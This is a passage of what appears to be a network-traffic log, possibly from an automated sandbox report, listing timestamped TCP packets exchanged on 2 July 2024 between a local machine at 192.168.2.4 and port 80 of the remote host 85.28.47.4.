                                            Jul 2, 2024 08:26:21.840296984 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.840306997 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.840323925 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.840347052 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.840518951 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.840565920 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.840662003 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.840672016 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.840682030 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.840692043 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.840702057 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.840708017 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.840711117 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.840737104 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.840749025 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.840929031 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.840945005 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.840955019 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.840965033 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.840975046 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.840976000 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.840986013 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.840992928 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.840997934 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.841007948 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.841022015 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.841041088 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.841312885 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.841322899 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.841335058 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.841357946 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.841382027 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.841465950 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.841475964 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.841485977 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.841495037 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.841505051 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.841511011 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.841515064 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.841523886 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.841531038 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.841535091 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.841543913 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.841551065 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.841555119 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.841564894 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.841571093 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.841576099 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.841586113 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.841590881 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.841610909 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.841629982 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.842108965 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.842158079 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.914952040 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.914979935 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.914989948 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.915066957 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.915101051 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.915112019 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.915121078 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.915131092 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.915148020 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.915179968 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.921148062 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.921184063 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.921192884 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.921224117 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.921262980 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.921345949 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.921355963 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.921365023 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.921375036 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.921387911 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.921406031 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.921605110 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.921616077 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.921627045 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.921637058 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.921648979 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.921653986 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.921674967 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.921696901 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.921938896 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.921950102 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.921963930 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.921974897 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.921983004 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.921992064 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.922003031 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.922030926 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.922182083 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.922192097 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.922208071 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.922218084 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.922228098 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.922229052 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.922234058 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.922269106 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.922543049 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.922552109 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.922561884 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.922571898 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.922578096 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.922586918 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.922596931 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.922616959 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.922641039 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.922974110 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.922982931 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.922991991 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.923002958 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.923012018 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.923013926 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.923022032 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.923032045 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.923036098 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.923048019 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.923069954 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.923077106 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.927545071 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.927592993 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.927603960 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.927643061 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.927660942 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.927666903 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.927680016 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.927697897 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.927728891 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.927756071 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.927767992 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.927787066 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.927808046 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.927879095 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.927891016 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.927911043 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.927931070 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.928023100 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.928033113 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.928044081 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.928052902 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.928070068 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.928088903 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.928164959 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.928175926 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.928186893 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.928199053 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.928201914 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.928232908 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.928247929 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.928389072 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.928400993 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.928412914 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.928420067 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.928432941 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.928452015 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.928509951 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.928519964 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.928531885 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.928540945 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.928549051 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.928570986 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.928721905 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.928733110 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.928745031 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.928755999 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.928757906 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.928771019 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.928775072 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.928781986 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.928788900 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.928813934 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.928986073 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.928997993 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.929008961 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.929017067 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.929020882 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.929033995 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.929045916 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.929052114 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.929075003 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.929094076 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.929259062 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.929270983 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.929289103 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.929291010 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.929302931 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.929312944 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.929316044 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.929321051 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.929328918 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.929335117 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.929341078 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.929348946 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.929353952 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.929369926 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.929394007 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.929964066 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.929975986 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.929986954 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.929996014 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.929999113 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.930016994 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.930016994 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.930028915 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.930036068 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.930042028 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.930053949 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.930059910 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.930083990 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.930368900 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.930380106 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.930392027 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.930402994 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.930403948 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.930416107 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.930427074 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.930433035 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.930438995 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.930449963 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.930457115 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.930461884 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.930483103 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.930494070 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.930505991 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.930517912 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.930529118 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.930541992 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.930547953 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.930561066 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.930566072 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.930573940 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.930584908 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.930597067 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.930608034 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.930608034 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.930618048 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.930620909 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.930629969 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.930633068 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.930655956 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.930685043 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.013098955 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.013144970 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.013159037 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.013169050 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.013194084 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.013200045 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.013211012 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.013237953 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.013259888 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.013277054 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.013288975 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.013305902 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.013314009 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.013344049 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.013518095 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.013530016 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.013540030 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.013550043 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.013564110 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.013570070 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.013575077 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.013581991 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.013593912 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.013603926 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.013612032 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.013616085 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.013632059 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.013655901 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.014084101 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.014096022 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.014106035 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.014118910 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.014132023 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.014157057 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.014317989 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.014329910 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.014360905 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.014383078 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.014394999 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.014405012 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.014415979 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.014451981 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.014787912 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.014799118 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.014810085 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.014826059 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.014836073 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.014839888 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.014848948 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.014856100 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.014861107 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.014863968 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.014863968 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.014872074 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.014884949 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.014902115 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.014903069 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.014914989 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.014920950 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.014951944 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.014951944 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.015458107 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.015469074 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.015485048 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.015513897 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.015513897 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.016454935 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.016530991 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.016534090 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.016544104 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.016577005 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.016585112 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.016643047 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.016657114 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.016669989 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.016681910 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.016711950 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.016825914 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.016838074 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.016849995 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.016869068 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.016891003 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.016911030 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.017044067 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.017060995 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.017071962 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.017083883 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.017086029 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.017095089 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.017101049 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.017119884 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.017147064 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.017313957 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.017323971 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.017349005 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.017362118 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.017365932 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.017374039 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.017385960 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.017396927 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.017405987 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.017426014 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.017450094 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.017649889 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.017667055 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.017690897 CEST6388080192.168.2.485.28.47.4
